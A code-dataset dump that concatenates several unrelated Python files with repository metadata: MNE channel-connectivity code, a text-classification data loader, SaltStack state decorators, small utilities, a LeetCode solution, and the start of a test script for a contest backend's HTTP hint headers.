(has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only,
has_neuromag_122_grad) = _get_ch_info(info)
conn_name = None
if has_vv_mag and ch_type == 'mag':
conn_name = 'neuromag306mag'
elif has_vv_grad and ch_type == 'grad':
conn_name = 'neuromag306planar'
elif has_neuromag_122_grad:
conn_name = 'neuromag122'
elif has_4D_mag:
if 'MEG 248' in info['ch_names']:
idx = info['ch_names'].index('MEG 248')
grad = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_GRAD
mag = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG
if ch_type == 'grad' and grad:
conn_name = 'bti248grad'
elif ch_type == 'mag' and mag:
conn_name = 'bti248'
elif 'MEG 148' in info['ch_names'] and ch_type == 'mag':
idx = info['ch_names'].index('MEG 148')
if info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG:
conn_name = 'bti148'
elif has_CTF_grad and ch_type == 'mag':
if info['nchan'] < 100:
conn_name = 'ctf64'
elif info['nchan'] > 200:
conn_name = 'ctf275'
else:
conn_name = 'ctf151'
elif n_kit_grads > 0:
from ..io.kit.constants import KIT_NEIGHBORS
conn_name = KIT_NEIGHBORS.get(info['kit_system_id'])
if conn_name is not None:
logger.info('Reading connectivity matrix for %s.' % conn_name)
return read_ch_connectivity(conn_name)
logger.info('Could not find a connectivity matrix for the data. '
'Computing connectivity based on Delaunay triangulations.')
return _compute_ch_connectivity(info, ch_type)
def _compute_ch_connectivity(info, ch_type):
"""Compute channel connectivity matrix using Delaunay triangulations.
Parameters
----------
info : instance of mne.measuerment_info.Info
The measurement info.
ch_type : str
The channel type for computing the connectivity matrix. Currently
supports 'mag', 'grad' and 'eeg'.
Returns
-------
ch_connectivity : scipy.sparse matrix, shape (n_channels, n_channels)
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
"""
from scipy.spatial import Delaunay
from .. import spatial_tris_connectivity
from ..channels.layout import _auto_topomap_coords, _pair_grad_sensors
combine_grads = (ch_type == 'grad' and FIFF.FIFFV_COIL_VV_PLANAR_T1 in
np.unique([ch['coil_type'] for ch in info['chs']]))
picks = dict(_picks_by_type(info, exclude=[]))[ch_type]
ch_names = [info['ch_names'][pick] for pick in picks]
if combine_grads:
pairs = _pair_grad_sensors(info, topomap_coords=False, exclude=[])
if len(pairs) != len(picks):
raise RuntimeError('Cannot find a pair for some of the '
'gradiometers. Cannot compute connectivity '
'matrix.')
xy = _auto_topomap_coords(info, picks[::2]) # only for one of the pair
else:
xy = _auto_topomap_coords(info, picks)
tri = Delaunay(xy)
neighbors = spatial_tris_connectivity(tri.simplices)
if combine_grads:
ch_connectivity = np.eye(len(picks), dtype=bool)
for idx, neigbs in zip(neighbors.row, neighbors.col):
for ii in range(2): # make sure each pair is included
for jj in range(2):
ch_connectivity[idx * 2 + ii, neigbs * 2 + jj] = True
ch_connectivity[idx * 2 + ii, idx * 2 + jj] = True # pair
ch_connectivity = sparse.csr_matrix(ch_connectivity)
else:
ch_connectivity = sparse.lil_matrix(neighbors)
ch_connectivity.setdiag(np.repeat(1, ch_connectivity.shape[0]))
ch_connectivity = ch_connectivity.tocsr()
return ch_connectivity, ch_names
def fix_mag_coil_types(info):
"""Fix magnetometer coil types.
Parameters
----------
info : dict
The info dict to correct. Corrections are done in-place.
Notes
-----
This function changes magnetometer coil types 3022 (T1: SQ20483N) and
3023 (T2: SQ20483-A) to 3024 (T3: SQ20950N) in the channel definition
records in the info structure.
Neuromag Vectorview systems can contain magnetometers with two
different coil sizes (3022 and 3023 vs. 3024). The systems
incorporating coils of type 3024 were introduced last and are used at
the majority of MEG sites. At some sites with 3024 magnetometers,
the data files have still defined the magnetometers to be of type
3022 to ensure compatibility with older versions of Neuromag software.
In the MNE software as well as in the present version of Neuromag
software coil type 3024 is fully supported. Therefore, it is now safe
to upgrade the data files to use the true coil type.
.. note:: The effect of the difference between the coil sizes on the
current estimates computed by the MNE software is very small.
Therefore the use of ``fix_mag_coil_types`` is not mandatory.
"""
old_mag_inds = _get_T1T2_mag_inds(info)
for ii in old_mag_inds:
info['chs'][ii]['coil_type'] = FIFF.FIFFV_COIL_VV_MAG_T3
logger.info('%d of %d T1/T2 magnetometer types replaced with T3.' %
(len(old_mag_inds), len(pick_types(info, meg='mag'))))
info._check_consistency()
def _get_T1T2_mag_inds(info):
"""Find T1/T2 magnetometer coil types."""
picks = pick_types(info, meg='mag')
old_mag_inds = []
for ii in picks:
ch = info['chs'][ii]
if ch['coil_type'] in (FIFF.FIFFV_COIL_VV_MAG_T1,
FIFF.FIFFV_COIL_VV_MAG_T2):
old_mag_inds.append(ii)
return old_mag_inds
def _get_ch_info(info):
"""Get channel info for inferring acquisition device."""
chs = info['chs']
# Only take first 16 bits, as higher bits store CTF comp order
coil_types = {ch['coil_type'] & 0xFFFF for ch in chs}
channel_types = {ch['kind'] for ch in chs}
has_vv_mag = any(k in coil_types for k in
[FIFF.FIFFV_COIL_VV_MAG_T1, FIFF.FIFFV_COIL_VV_MAG_T2,
FIFF.FIFFV_COIL_VV_MAG_T3])
has_vv_grad = any(k in coil_types for k in [FIFF.FIFFV_COIL_VV_PLANAR_T1,
FIFF.FIFFV_COIL_VV_PLANAR_T2,
FIFF.FIFFV_COIL_VV_PLANAR_T3])
has_neuromag_122_grad = any(k in coil_types
for k in [FIFF.FIFFV_COIL_NM_122])
is_old_vv = ' ' in chs[0]['ch_name']
has_4D_mag = FIFF.FIFFV_COIL_MAGNES_MAG in coil_types
ctf_other_types = (FIFF.FIFFV_COIL_CTF_REF_MAG,
FIFF.FIFFV_COIL_CTF_REF_GRAD,
FIFF.FIFFV_COIL_CTF_OFFDIAG_REF_GRAD)
has_CTF_grad = (FIFF.FIFFV_COIL_CTF_GRAD in coil_types or
(FIFF.FIFFV_MEG_CH in channel_types and
any(k in ctf_other_types for k in coil_types)))
# hack due to MNE-C bug in IO of CTF
# only take first 16 bits, as higher bits store CTF comp order
n_kit_grads = sum(ch['coil_type'] & 0xFFFF == FIFF.FIFFV_COIL_KIT_GRAD
for ch in chs)
has_any_meg = any([has_vv_mag, has_vv_grad, has_4D_mag, has_CTF_grad,
n_kit_grads])
has_eeg_coils = (FIFF.FIFFV_COIL_EEG in coil_types and
FIFF.FIFFV_EEG_CH in channel_types)
has_eeg_coils_and_meg = has_eeg_coils and has_any_meg
has_eeg_coils_only = has_eeg_coils and not has_any_meg
return (has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only, has_neuromag_122_grad)
def make_1020_channel_selections(info, midline="z"):
"""Return dict mapping from ROI names to lists of picks for 10/20 setups.
This passes through all channel names, and uses a simple heuristic to
separate channel names into three Region of Interest-based selections:
Left, Midline and Right. The heuristic is that channels ending on any of
the characters in `midline` are filed under that heading, otherwise those
ending in odd numbers under "Left", those in even numbers under "Right".
Other channels are ignored. This is appropriate for 10/20 files, but not
for other channel naming conventions.
If an info object is provided, lists are sorted from posterior to anterior.
Parameters
----------
info : instance of Info
Where to obtain the channel names from. The picks will
be in relation to the position in `info["ch_names"]`. If possible, this
lists will be sorted by y value position of the channel locations,
i.e., from back to front.
midline : str
Names ending in any of these characters are stored under the `Midline`
key. Defaults to 'z'. Note that capitalization is ignored.
Returns
-------
selections : dict
A dictionary mapping from ROI names to lists of picks (integers).
"""
_validate_type(info, "info")
try:
from .layout import find_layout
layout = find_layout(info)
pos = layout.pos
ch_names = layout.names
except RuntimeError: # no channel positions found
ch_names = info["ch_names"]
pos = None
selections = dict(Left=[], Midline=[], Right=[])
for pick, channel in enumerate(ch_names):
last_char = channel[-1].lower() # in 10/20, last char codes hemisphere
if last_char in midline:
selection = "Midline"
elif last_char.isdigit():
selection = "Left" if int(last_char) % 2 else "Right"
else: # ignore the channel
continue
selections[selection].append(pick)
if pos is not None:
# sort channels from front to center
# (y-coordinate of the position info in the layout)
selections = {selection: np.array(picks)[pos[picks, 1].argsort()]
for selection, picks in selections.items()}
return selections
| 37.603484
| 79
| 0.588592
|
8d00568c0692ef921dd0bbda0eefcab73493f0ce
| 7,705
|
py
|
Python
|
data_helpers.py
|
alexeyev/CNN-for-Sentence-Classification-in-Keras
|
1a011950b9256f1c6da5b7f46dd6826fb2a3bafe
|
[
"MIT"
] | 7
|
2016-09-29T09:46:13.000Z
|
2018-05-23T09:29:38.000Z
|
data_helpers.py
|
alexeyev/CNN-for-Sentence-Classification-in-Keras
|
1a011950b9256f1c6da5b7f46dd6826fb2a3bafe
|
[
"MIT"
] | null | null | null |
data_helpers.py
|
alexeyev/CNN-for-Sentence-Classification-in-Keras
|
1a011950b9256f1c6da5b7f46dd6826fb2a3bafe
|
[
"MIT"
] | 1
|
2019-07-02T06:26:59.000Z
|
2019-07-02T06:26:59.000Z
|
# coding:utf-8
"""
Custom datasets reading and preprocessing routines
"""
import itertools
import re
from collections import Counter
import numpy as np
import pandas as pd
import pymystem3
mystem = pymystem3.Mystem()
def clean_str(string):
"""
Tokenization/string cleaning for all datasets except for SST.
Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py
"""
string = re.sub(r"[^A-Za-zА-Яа-я0-9(),!?\'\`]", " ", string)
string = re.sub(r"\'s", " \'s", string)
string = re.sub(r"\'ve", " \'ve", string)
string = re.sub(r"n\'t", " n\'t", string)
string = re.sub(r"\'re", " \'re", string)
string = re.sub(r"\'d", " \'d", string)
string = re.sub(r"\'ll", " \'ll", string)
string = re.sub(r",", " , ", string)
string = re.sub(r"!", " ! ", string)
string = re.sub(r"\(", " \( ", string)
string = re.sub(r"\)", " \) ", string)
string = re.sub(r"\?", " \? ", string)
string = re.sub(r"\s{2,}", " ", string)
return string.strip().lower()
def load_data_and_labels_pos_neg():
"""
Loads MR polarity data from files, splits the data into words and generates labels.
Returns split sentences and labels.
"""
# Load data from files
positive_examples = list(open("./data/rt-polarity.pos").readlines())
positive_examples = [s.strip() for s in positive_examples]
negative_examples = list(open("./data/rt-polarity.neg").readlines())
negative_examples = [s.strip() for s in negative_examples]
# Split by words
x_text = positive_examples + negative_examples
x_text = [clean_str(sent) for sent in x_text]
x_text = [s.split(" ") for s in x_text]
# Generate labels
positive_labels = [[0, 1] for _ in positive_examples]
negative_labels = [[1, 0] for _ in negative_examples]
y = np.concatenate([positive_labels, negative_labels], 0)
return [x_text, y]
def pad_sentences(sentences, maxlen=56, padding_word="<PAD/>"):
"""
Pads all sentences to the same length.
Returns padded sentences.
"""
sequence_length = maxlen # max(len(x) for x in sentences)
padded_sentences = []
for i in range(len(sentences)):
sentence = sentences[i]
num_padding = max(0, sequence_length - len(sentence))
new_sentence = sentence[:sequence_length] + [padding_word] * num_padding
padded_sentences.append(new_sentence)
return padded_sentences
def build_vocab(sentences):
"""
Builds a vocabulary mapping from word to index based on the sentences.
Returns vocabulary mapping and inverse vocabulary mapping.
"""
# Build vocabulary
word_counts = Counter(itertools.chain(*sentences))
# Mapping from index to word
vocabulary_inv = [x[0] for x in word_counts.most_common()]
# Mapping from word to index
vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}
return [vocabulary, vocabulary_inv]
def build_input_x(sentences, vocabulary):
"""
Maps sentencs and labels to vectors based on a vocabulary.
"""
x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences])
return x
def build_input_data(sentences, labels, vocabulary):
"""
Maps sentencs and labels to vectors based on a vocabulary.
"""
x = build_input_x(sentences, vocabulary)
y = np.array(labels)
return [x, y]
def load_data_pos_neg():
"""
Loads and preprocessed data for the MR dataset.
Returns input vectors, labels, vocabulary, and inverse vocabulary.
"""
# Load and preprocess data
sentences, labels = load_data_and_labels_pos_neg()
sentences_padded = pad_sentences(sentences)
vocabulary, vocabulary_inv = build_vocab(sentences_padded)
x, y = build_input_data(sentences_padded, labels, vocabulary)
return [x, y, vocabulary, vocabulary_inv]
def build_word_level_data(train_data, test_data):
sentences_train, labels_train = train_data
sentences_test, labels_test = test_data
sentences_train = [clean_str(sent) for sent in sentences_train]
sentences_train = [mystem.lemmatize(s) for s in sentences_train]
sentences_test = [clean_str(sent) for sent in sentences_test]
sentences_test = [mystem.lemmatize(s) for s in sentences_test]
sentences_train_padded = pad_sentences(list(sentences_train))
sentences_test_padded = pad_sentences(list(sentences_test))
print(" ".join(sentences_train_padded[0]))
vocabulary, vocabulary_inv = \
build_vocab(sentences_train_padded + sentences_test_padded)
x_train, y_train = build_input_data(sentences_train_padded, labels_train, vocabulary)
x_test, y_test = build_input_data(sentences_test_padded, labels_test, vocabulary)
return x_train, y_train, x_test, y_test, vocabulary, vocabulary_inv
def encode_word_level_data(prepared_x, vocabulary):
x = build_input_x(pad_sentences(list(prepared_x.ix[:, 0])), vocabulary)
return x
def batch_iter(data, batch_size, num_epochs):
"""
Generates a batch iterator for a dataset.
"""
data = np.array(data)
data_size = len(data.shape[0])
num_batches_per_epoch = int(len(data) / batch_size) + 1
for epoch in range(num_epochs):
# Shuffle the data at each epoch
shuffle_indices = np.random.permutation(np.arange(data_size))
shuffled_data = data[shuffle_indices]
for batch_num in range(num_batches_per_epoch):
start_index = batch_num * batch_size
end_index = min((batch_num + 1) * batch_size, data_size)
yield shuffled_data[start_index:end_index]
def read_data_file(fname, target_index=0, normalize=True, binary=False):
content = pd.read_csv(fname, header=None, index_col=False)
content.dropna(inplace=True)
content.reset_index(inplace=True, drop=True)
x = content.ix[:, content.shape[1] - 1]
x = np.array(x)
y = content.ix[:, target_index].values + 0.0
if normalize:
max_y = np.max(np.abs(y))
y /= max_y
if binary:
vals = list(set(y))
if len(vals) > 2:
raise Exception("Binary input data is not binary! Dataset %s, target_index=%d" % (fname, target_index))
y = np.array([0 if a == vals[0] else 1 for a in y])
return x, y
def load_ok_data_gender():
train_data = read_data_file('./data/ok/ok_train.csv', target_index=2, binary=True)
test_data = read_data_file('./data/ok/ok_test.csv', target_index=2, binary=True)
return train_data, test_data
def load_ok_user_data_gender():
train_data = read_data_file('./data/ok/ok_user_train.csv', target_index=2, binary=True)
test_data = read_data_file('./data/ok/ok_user_test.csv', target_index=2, binary=True)
return train_data, test_data
def load_sentirueval_data():
train_data = read_data_file('./data/sentirueval/train.csv')
test_data = read_data_file('./data/sentirueval/test.csv')
return train_data, test_data
def shuffle_matrix(x, y):
stacked = np.hstack((np.matrix(x).T, np.asmatrix(y).T))
np.random.shuffle(stacked)
xi = np.array(stacked[:, 0]).flatten()
yi = np.array(stacked[:, 1:])
return xi, yi
def clean_data_np(x):
# load data
all = [s.strip() for s in list(x)]
# split by words
x_text = [clean_str(sent) for sent in all]
x_text = [s.split(u" ") for s in x_text]
return x_text
def clean_data_lists(x):
# load data
all = [s.strip() for s in x]
# split by words
x_text = [clean_str(sent) for sent in all]
x_text = [s.split(u" ") for s in x_text]
return x_text
if __name__ == '__main__':
# read_w2v()
df = pd.DataFrame([{"x": u"привет"}, {"x": u"пока"}])
| 32.37395
| 115
| 0.670993
|
dd61b6b3ce3f8d32f8e1ae4c0fc133412ad32823
| 523
|
py
|
Python
|
mmedit/models/backbones/encoder_decoders/encoders/__init__.py
|
rivergold/mmediting
|
fd972635c48bb065db29d1b5090592a87c7263d2
|
[
"Apache-2.0"
] | 1
|
2021-04-30T23:08:16.000Z
|
2021-04-30T23:08:16.000Z
|
mmedit/models/backbones/encoder_decoders/encoders/__init__.py
|
rivergold/mmediting
|
fd972635c48bb065db29d1b5090592a87c7263d2
|
[
"Apache-2.0"
] | null | null | null |
mmedit/models/backbones/encoder_decoders/encoders/__init__.py
|
rivergold/mmediting
|
fd972635c48bb065db29d1b5090592a87c7263d2
|
[
"Apache-2.0"
] | 2
|
2021-09-07T05:21:18.000Z
|
2021-09-17T22:34:54.000Z
|
from .deepfill_encoder import DeepFillEncoder
from .gl_encoder import GLEncoder
from .indexnet_encoder import (DepthwiseIndexBlock, HolisticIndexBlock,
IndexNetEncoder)
from .pconv_encoder import PConvEncoder
from .resnet_enc import ResGCAEncoder, ResNetEnc, ResShortcutEnc
from .vgg import VGG16
__all__ = [
'GLEncoder', 'VGG16', 'ResNetEnc', 'HolisticIndexBlock',
'DepthwiseIndexBlock', 'ResShortcutEnc', 'PConvEncoder', 'DeepFillEncoder',
'IndexNetEncoder', 'ResGCAEncoder'
]
| 37.357143
| 79
| 0.751434
|
3c32d1ba8369e99f2afe58d675224de3e510c4c2
| 3,062
|
py
|
Python
|
salt/utils/decorators/state.py
|
yuriks/salt
|
d2a5bd8adddb98ec1718d79384aa13b4f37e8028
|
[
"Apache-2.0",
"MIT"
] | 1
|
2020-03-31T22:51:16.000Z
|
2020-03-31T22:51:16.000Z
|
salt/utils/decorators/state.py
|
yuriks/salt
|
d2a5bd8adddb98ec1718d79384aa13b4f37e8028
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
salt/utils/decorators/state.py
|
yuriks/salt
|
d2a5bd8adddb98ec1718d79384aa13b4f37e8028
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-09-30T07:00:01.000Z
|
2021-09-30T07:00:01.000Z
|
# -*- coding: utf-8 -*-
'''
Decorators for salt.state
:codeauthor: :email:`Bo Maryniuk (bo@suse.de)`
'''
# Import Python libs
from __future__ import absolute_import, unicode_literals
import logging
# Import salt libs
import salt.utils.stringutils
from salt.exceptions import SaltException
log = logging.getLogger(__name__)
class OutputUnifier(object):
def __init__(self, *policies):
self.policies = []
for pls in policies:
if not hasattr(self, pls):
raise SaltException('Unknown policy: {0}'.format(pls))
else:
self.policies.append(getattr(self, pls))
def __call__(self, func):
def _func(*args, **kwargs):
result = func(*args, **kwargs)
for pls in self.policies:
try:
result = pls(result)
except Exception as exc: # pylint: disable=broad-except
log.debug('An exception occurred in this state: %s', exc,
exc_info_on_loglevel=logging.DEBUG)
result = {
'result': False,
'name': 'later',
'changes': {},
'comment': 'An exception occurred in this state: {0}'.format(exc)
}
return result
return _func
def content_check(self, result):
'''
Checks for specific types in the state output.
Raises an Exception in case particular rule is broken.
:param result:
:return:
'''
if not isinstance(result, dict):
err_msg = 'Malformed state return. Data must be a dictionary type.'
elif not isinstance(result.get('changes'), dict):
err_msg = "'Changes' should be a dictionary."
else:
missing = []
for val in ['name', 'result', 'changes', 'comment']:
if val not in result:
missing.append(val)
if missing:
err_msg = 'The following keys were not present in the state return: {0}.'.format(', '.join(missing))
else:
err_msg = None
if err_msg:
raise SaltException(err_msg)
return result
def unify(self, result):
'''
While comments as a list are allowed,
comments needs to be strings for backward compatibility.
See such claim here: https://github.com/saltstack/salt/pull/43070
Rules applied:
- 'comment' is joined into a multi-line string, in case the value is a list.
- 'result' should be always either True, False or None.
:param result:
:return:
'''
if isinstance(result.get('comment'), list):
result['comment'] = u'\n'.join([
salt.utils.stringutils.to_unicode(elm) for elm in result['comment']
])
if result.get('result') is not None:
result['result'] = bool(result['result'])
return result
| 32.574468
| 116
| 0.545395
|
eda9603db063d35edf9811595032bf20a9f8600d
| 76
|
py
|
Python
|
python/test/test_two-dimensional_array.py
|
1005281342/learn
|
c9d1e2e256842d9b4846c4870ac72e83d172b20e
|
[
"Apache-2.0"
] | 1
|
2018-11-29T01:01:32.000Z
|
2018-11-29T01:01:32.000Z
|
python/test/test_two-dimensional_array.py
|
1005281342/learn
|
c9d1e2e256842d9b4846c4870ac72e83d172b20e
|
[
"Apache-2.0"
] | null | null | null |
python/test/test_two-dimensional_array.py
|
1005281342/learn
|
c9d1e2e256842d9b4846c4870ac72e83d172b20e
|
[
"Apache-2.0"
] | null | null | null |
a = [1, 2, 3]
b = [3, 2, 1]
res = [i + j for i in a for j in b]
print(res)
| 12.666667
| 35
| 0.460526
|
8e3e3b0afb443f99f9960d7f468f0200c7044fe1
| 49
|
py
|
Python
|
app/s2t2_script.py
|
antoniogriffith/example-open-source-repo-2021
|
7ae3e8342a0acf60b491e938566156215ccc4d14
|
[
"MIT"
] | null | null | null |
app/s2t2_script.py
|
antoniogriffith/example-open-source-repo-2021
|
7ae3e8342a0acf60b491e938566156215ccc4d14
|
[
"MIT"
] | null | null | null |
app/s2t2_script.py
|
antoniogriffith/example-open-source-repo-2021
|
7ae3e8342a0acf60b491e938566156215ccc4d14
|
[
"MIT"
] | null | null | null |
print("HELLO WORLD!")
print("akg74_script.py")
| 9.8
| 24
| 0.693878
|
ae64668d45c2fef25a01df8a0211d105a9fdace1
| 959
|
py
|
Python
|
transcriptic/sampledata/project.py
|
transcriptic/transcriptic
|
1b5df943db266d18dbf055d0ace68c3cde8980e9
|
[
"BSD-3-Clause"
] | 32
|
2015-10-27T22:51:05.000Z
|
2020-03-26T00:43:32.000Z
|
transcriptic/sampledata/project.py
|
transcriptic/transcriptic
|
1b5df943db266d18dbf055d0ace68c3cde8980e9
|
[
"BSD-3-Clause"
] | 95
|
2015-10-27T15:30:46.000Z
|
2020-03-30T00:38:05.000Z
|
transcriptic/sampledata/project.py
|
transcriptic/transcriptic
|
1b5df943db266d18dbf055d0ace68c3cde8980e9
|
[
"BSD-3-Clause"
] | 10
|
2015-10-27T06:35:30.000Z
|
2019-09-26T15:18:49.000Z
|
from transcriptic.jupyter import Project
from transcriptic.util import load_sampledata_json
def load_project_from_attributes(project_id: str, attributes: dict) -> Project:
"""
Helper function for constructing an object from specified attributes
"""
return Project(
project_id,
attributes=attributes,
)
sample_project_attr = load_sampledata_json("p123.json")
def load_sample_project(project_id="p123") -> Project:
"""
Loads sample project from registered mocked data.
Example Usage:
.. code-block:: python
my_project = load_sample_project()
my_project.name
Parameters
----------
project_id: str
ProjectId of registered object mock to load.
Returns
-------
Project
Returns a Project object with some mocked data
"""
return load_project_from_attributes(
project_id, load_sampledata_json(f"{project_id}.json")
)
| 22.833333
| 79
| 0.671533
|
f76a15d5a214460f77c5f990a1f21e5a8a02763b
| 1,440
|
py
|
Python
|
leetcode/editor/cn/FriendsOfAppropriateAges.py
|
huangge1199/leet-code-python
|
5d01bbb6f12a495ea7ea0a90b5b3b4aa92bcc2f7
|
[
"Apache-2.0"
] | 1
|
2022-02-12T13:55:41.000Z
|
2022-02-12T13:55:41.000Z
|
leetcode/editor/cn/FriendsOfAppropriateAges.py
|
huangge1199/leet-code-python
|
5d01bbb6f12a495ea7ea0a90b5b3b4aa92bcc2f7
|
[
"Apache-2.0"
] | null | null | null |
leetcode/editor/cn/FriendsOfAppropriateAges.py
|
huangge1199/leet-code-python
|
5d01bbb6f12a495ea7ea0a90b5b3b4aa92bcc2f7
|
[
"Apache-2.0"
] | null | null | null |
# 在社交媒体网站上有 n 个用户。给你一个整数数组 ages ,其中 ages[i] 是第 i 个用户的年龄。
#
# 如果下述任意一个条件为真,那么用户 x 将不会向用户 y(x != y)发送好友请求:
#
#
# age[y] <= 0.5 * age[x] + 7
# age[y] > age[x]
# age[y] > 100 && age[x] < 100
#
#
# 否则,x 将会向 y 发送一条好友请求。
#
# 注意,如果 x 向 y 发送一条好友请求,y 不必也向 x 发送一条好友请求。另外,用户不会向自己发送好友请求。
#
# 返回在该社交媒体网站上产生的好友请求总数。
#
#
#
# 示例 1:
#
#
# 输入:ages = [16,16]
# 输出:2
# 解释:2 人互发好友请求。
#
#
# 示例 2:
#
#
# 输入:ages = [16,17,18]
# 输出:2
# 解释:产生的好友请求为 17 -> 16 ,18 -> 17 。
#
#
# 示例 3:
#
#
# 输入:ages = [20,30,100,110,120]
# 输出:3
# 解释:产生的好友请求为 110 -> 100 ,120 -> 110 ,120 -> 100 。
#
#
#
#
# 提示:
#
#
# n == ages.length
# 1 <= n <= 2 * 10⁴
# 1 <= ages[i] <= 120
#
# Related Topics 数组 双指针 二分查找 排序 👍 85 👎 0
# 825:适龄的朋友
# leetcode submit region begin(Prohibit modification and deletion)
from typing import List
class Solution:
def numFriendRequests(self, ages: List[int]) -> int:
n = len(ages)
ages.sort()
start = 0
end = 0
count = 0
for age in ages:
if age < 15:
continue
while ages[start] <= 0.5 * age + 7:
start += 1
while end + 1 < n and ages[end + 1] <= age:
end += 1
count += end - start
return count
if __name__ == "__main__":
Solution().numFriendRequests([16, 17, 18])
# leetcode submit region end(Prohibit modification and deletion)
| 17.777778
| 66
| 0.506944
|
9fe19eabdaf00e746f5c45764afcfdfdcac0c5c6
| 102
|
py
|
Python
|
basedir.py
|
xdvlabs/xumm-sdk-py
|
c92066a6e9738e402e0ae1627dd21fbc6b3bead1
|
[
"MIT"
] | 4
|
2022-01-29T11:22:06.000Z
|
2022-03-01T03:36:59.000Z
|
basedir.py
|
CASL-AE/xumm-py
|
dbe040f409ffc5f918086a12f190ef289e709d22
|
[
"MIT"
] | 4
|
2022-01-14T22:49:02.000Z
|
2022-01-18T17:32:21.000Z
|
basedir.py
|
CASL-AE/xumm-py
|
dbe040f409ffc5f918086a12f190ef289e709d22
|
[
"MIT"
] | 2
|
2022-03-01T03:32:35.000Z
|
2022-03-20T17:11:56.000Z
|
#!/usr/bin/env python
# coding: utf-8
import os
basedir = os.path.abspath(os.path.dirname(__file__))
| 17
| 52
| 0.72549
|
989f76b647fa12a158a99018d1de348250889d14
| 934
|
py
|
Python
|
ailib/tools/utils_ipython.py
|
vandykai/ailib
|
6ccb9536dc3f6f8ff138335d0153a2982635fca8
|
[
"Apache-2.0"
] | null | null | null |
ailib/tools/utils_ipython.py
|
vandykai/ailib
|
6ccb9536dc3f6f8ff138335d0153a2982635fca8
|
[
"Apache-2.0"
] | null | null | null |
ailib/tools/utils_ipython.py
|
vandykai/ailib
|
6ccb9536dc3f6f8ff138335d0153a2982635fca8
|
[
"Apache-2.0"
] | null | null | null |
from contextlib import contextmanager
import pandas as pd
import IPython
@contextmanager
def pd_display_all():
max_columns = pd.options.display.max_columns
max_rows = pd.options.display.max_rows
pd.options.display.max_columns=None
pd.options.display.max_rows=None
yield None
pd.options.display.max_columns = max_columns
pd.options.display.max_rows = max_rows
@contextmanager
def pd_display_reset():
max_columns = pd.options.display.max_columns
max_rows = pd.options.display.max_rows
pd.reset_option('display.max_columns')
pd.reset_option('display.max_rows')
yield None
pd.options.display.max_columns = max_columns
pd.options.display.max_rows = max_rows
def display_img(img_url):
display(IPython.display.Image(img))
def display_html(html_str):
display(IPython.display.HTML(html_str))
def display_pd(data_frame):
with pd_display_all():
display(data_frame)
| 28.30303
| 48
| 0.759101
|
b5e2f6574ed00b2298d8ff29f4499bc2c3d75a43
| 384
|
py
|
Python
|
tests/echo.py
|
beosro/judy
|
37fa9513dd755a865248c1cf26f197259b99a1fb
|
[
"MIT"
] | 35
|
2016-09-02T08:27:51.000Z
|
2021-08-02T22:22:08.000Z
|
tests/echo.py
|
nickoala/judy
|
37fa9513dd755a865248c1cf26f197259b99a1fb
|
[
"MIT"
] | null | null | null |
tests/echo.py
|
nickoala/judy
|
37fa9513dd755a865248c1cf26f197259b99a1fb
|
[
"MIT"
] | 26
|
2017-01-11T04:54:08.000Z
|
2019-07-10T04:35:42.000Z
|
import judy
vin = judy.VoiceIn(adcdev='plughw:1,0',
lm='/home/pi/judy/resources/lm/0931.lm',
dict='/home/pi/judy/resources/lm/0931.dic')
vout = judy.VoiceOut(device='plughw:0,0',
resources='/home/pi/judy/resources/audio')
def handle(phrase):
print 'Heard:', phrase
vout.say(phrase)
judy.listen(vin, vout, handle)
| 25.6
| 63
| 0.596354
|
8b2ec94fdc3a66d27a633ff774c3f7bfd7ad835e
| 13,087
|
py
|
Python
|
tests/test_hint_headers.py
|
davidnarum/bebras-platform
|
2ff4abb121e4eb0ef3a635c363169b70ccef2666
|
[
"MIT"
] | 5
|
2017-06-08T10:14:16.000Z
|
2021-07-27T21:51:58.000Z
|
tests/test_hint_headers.py
|
davidnarum/bebras-platform
|
2ff4abb121e4eb0ef3a635c363169b70ccef2666
|
[
"MIT"
] | 22
|
2016-09-01T20:21:13.000Z
|
2021-06-22T15:19:33.000Z
|
tests/test_hint_headers.py
|
davidnarum/bebras-platform
|
2ff4abb121e4eb0ef3a635c363169b70ccef2666
|
[
"MIT"
] | 8
|
2015-12-01T12:55:49.000Z
|
2020-11-01T13:33:58.000Z
|
#!/usr/bin/env python3
"""
This script exercises all endpoints normally accessed during a contest,
and checks that the X-Backend-Hints headers are correctly set on each
response.
"""
import http.client
import http.cookies
import json
import urllib.request
import urllib.parse
import urllib.error
import re
import sys
import traceback
QuotedStringRe = re.compile("\"(?:\\\\.|[^\"\\\\])*\"")
def unquote(qs):
qs = re.sub("^\"", '', qs)
qs = re.sub("\"$", '', qs)
qs = re.sub("\\\\(.)", '\\1', qs)
return qs
def read_http_header_value(raw_value):
return list(map(unquote, QuotedStringRe.findall(raw_value)))
class Transaction(object):
def __init__(self, host, port=None, http_host=None, base=None):
self.host = host
self.port = port if port is not None else 80
self.http_host = http_host if http_host is not None else host
self.base = '' if base is None else base
self.sid = None # "e9avt4qvh4e06dqficqhv567u4"
def post_generic_request(self, endpoint, params):
# TODO: test params['SID'] = self.sid or clean up backend
post_body = urllib.parse.urlencode(params)
headers = {
'Host': self.http_host,
'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept': 'application/json'
}
if self.sid is not None:
headers['Cookie'] = "contest2={}".format(self.sid)
conn = http.client.HTTPConnection(self.host, self.port)
path = urllib.parse.urljoin(self.base, endpoint)
# print("base {}, endpoint {}, path {}".format(self.base, endpoint, path))
conn.request('POST', path, post_body, headers)
response = conn.getresponse()
if response.status != 200:
raise Exception(
'bad response {} {}'.format(response.status, response.reason))
# for header in response.getheaders():
# print(header)
hints = response.getheader('X-Backend-Hints', "")
cookies = http.cookies.SimpleCookie(response.getheader('Set-Cookie'))
